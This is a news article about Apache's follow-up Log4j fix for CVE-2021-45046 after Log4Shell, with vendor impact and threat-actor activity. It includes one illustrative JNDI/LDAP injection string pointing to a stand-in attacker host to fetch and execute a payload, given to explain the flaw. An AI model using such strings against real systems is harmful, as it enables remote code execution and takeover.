The Apache Software Foundation (ASF) has pushed out a new fix
for the Log4j logging utility after the previous patch for the
recently disclosed Log4Shell[1] exploit was deemed as
“incomplete in certain non-default configurations.”
The second vulnerability — tracked as CVE-2021-45046[2]
— is rated 3.7 out of a maximum of 10 on the CVSS rating system and
affects all versions of Log4j from 2.0-beta9 through 2.12.1 and
2.13.0 through 2.15.0, which the project maintainers shipped last
week to address a critical remote code execution vulnerability
(CVE-2021-44228) that could be abused to infiltrate and take over
systems.
The incomplete patch for CVE-2021-44228[3], could be abused to
“craft malicious input data using a JNDI[4]
Lookup pattern resulting in a denial-of-service (DoS) attack,” the
ASF said[5]
in a new advisory. The latest version of Log4j, 2.16, all but
removes[6]
support for message lookups and disables JNDI by default, the
component that’s at the heart of the vulnerability. Users requiring
Java 7 are recommended to upgrade to Log4j release 2.12.2 when it
becomes available.
“Dealing with CVE-2021-44228 has shown the JNDI has significant
security issues,” Ralph Goers of the ASF explained[7]. “While we have
mitigated what we are aware of it would be safer for users to
completely disable it by default, especially since the large
majority are unlikely to be using it.”
JNDI, short for Java Naming and Directory Interface, is a Java
API that enables applications coded in the programming language to
look up data and resources such as LDAP[8] servers. Log4Shell is
resident in the Log4j library, an open-source, Java-based logging
framework commonly incorporated into Apache web servers.
The issue itself occurs when the JNDI component of the LDAP
connector is leveraged to inject a malicious LDAP request —
something like
“${jndi:ldap://attacker_controled_website/payload_to_be_executed}”
— that, when logged on a web server running the vulnerable version
of the library, enables an adversary to retrieve a payload from a
remote domain and execute it locally.
The latest update arrives as fallout from the flaw has resulted
in a “true cyber pandemic,” what with several threat actors seizing
on Log4Shell in ways that lay the groundwork for further[9]
attacks[10], including deploying
coin miners, remote access trojans, and ransomware on susceptible
machines. The opportunistic intrusions are said to have commenced
at least since December 1, although the bug became common knowledge
on December 9.
The security flaw has sparked widespread alarm because it exists
in a near-ubiquitously used logging framework in Java applications,
presenting bad actors with an unprecedented gateway to penetrate
and compromise millions of devices across the world.
Spelling further trouble for organizations, the remotely
exploitable flaw also impacts hundreds[11] of major enterprise[12] products from a number
of companies such as Akamai[13], Amazon[14], Apache[15], Apereo[16], Atlassian[17], Broadcom[18], Cisco[19], Cloudera[20], ConnectWise[21], Debian[22], Docker[23], Fortinet[24], Google[25], IBM[26], Intel[27], Juniper Networks[28], Microsoft[29], Okta[30], Oracle[31], Red
Hat[32], SolarWinds[33], SonicWall[34], Splunk[35], Ubuntu[36], VMware[37], Zscaler[38], and Zoho[39], posing a significant
software supply chain risk.
“Unlike other major cyberattacks that involve one or a limited
number of software, Log4j is basically embedded in every Java based
product or web service. It is very difficult to manually remediate
it,” Israeli security company Check Point said[40]. “This vulnerability,
because of the complexity in patching it and easiness to exploit,
seems that it will stay with us for years to come, unless companies
and services take immediate action to prevent the attacks on their
products by implementing a protection.”
In the days after the bug was disclosed, at least ten different groups[41] have jumped in on the
exploit bandwagon and roughly 44% of corporate networks globally
already have been under attack, marking a significant escalation of
sorts. The U.S. Cybersecurity and Infrastructure Security Agency
(CISA) has also added Log4Shell to its Known Exploited Vulnerabilities
Catalog[42], giving federal
agencies a deadline of December 24 to incorporate patches for the
vulnerability.
Sean Gallagher, a senior threat researcher at Sophos, warned
that “adversaries are likely grabbing as much access to whatever
they can get right now with the view to monetize and/or capitalize
on it later on,” adding “there is a lull before the storm in terms
of more nefarious activity from the Log4Shell vulnerability.”
“The most immediate priority for defenders is to reduce exposure
by patching and mitigating all corners of their infrastructure and
investigate exposed and potentially compromised systems. This
vulnerability can be everywhere,” Gallagher added.
References
- ^
Log4Shell
(thehackernews.com) - ^
CVE-2021-45046
(nvd.nist.gov) - ^
CVE-2021-44228
(nvd.nist.gov) - ^
JNDI
(en.wikipedia.org) - ^
said
(logging.apache.org) - ^
removes
(logging.apache.org) - ^
explained
(issues.apache.org) - ^
LDAP
(en.wikipedia.org) - ^
further
(thehackernews.com) - ^
attacks
(thehackernews.com) - ^
hundreds
(github.com) - ^
major enterprise
(github.com) - ^
Akamai
(developer.akamai.com) - ^
Amazon
(aws.amazon.com) - ^
Apache
(blogs.apache.org) - ^
Apereo
(apereo.github.io) - ^
Atlassian
(confluence.atlassian.com) - ^
Broadcom
(support.broadcom.com) - ^
Cisco
(tools.cisco.com) - ^
Cloudera
(blog.cloudera.com) - ^
ConnectWise
(www.connectwise.com) - ^
Debian
(security-tracker.debian.org) - ^
Docker
(www.docker.com) - ^
Fortinet
(www.fortiguard.com) - ^
Google
(cloud.google.com) - ^
IBM
(www.ibm.com) - ^
Intel
(www.intel.com) - ^
Juniper Networks
(kb.juniper.net) - ^
Microsoft
(msrc-blog.microsoft.com) - ^
Okta
(sec.okta.com) - ^
Oracle
(blogs.oracle.com) - ^
Red Hat
(access.redhat.com) - ^
SolarWinds
(www.solarwinds.com) - ^
SonicWall
(psirt.global.sonicwall.com) - ^
Splunk
(www.splunk.com) - ^
Ubuntu
(ubuntu.com) - ^
VMware
(www.vmware.com) - ^
Zscaler
(trust.zscaler.com) - ^
Zoho
(pitstop.manageengine.com) - ^
said
(blog.checkpoint.com) - ^
ten
different groups (blog.netlab.360.com) - ^
Known
Exploited Vulnerabilities Catalog
(thehackernews.com)
Read more https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html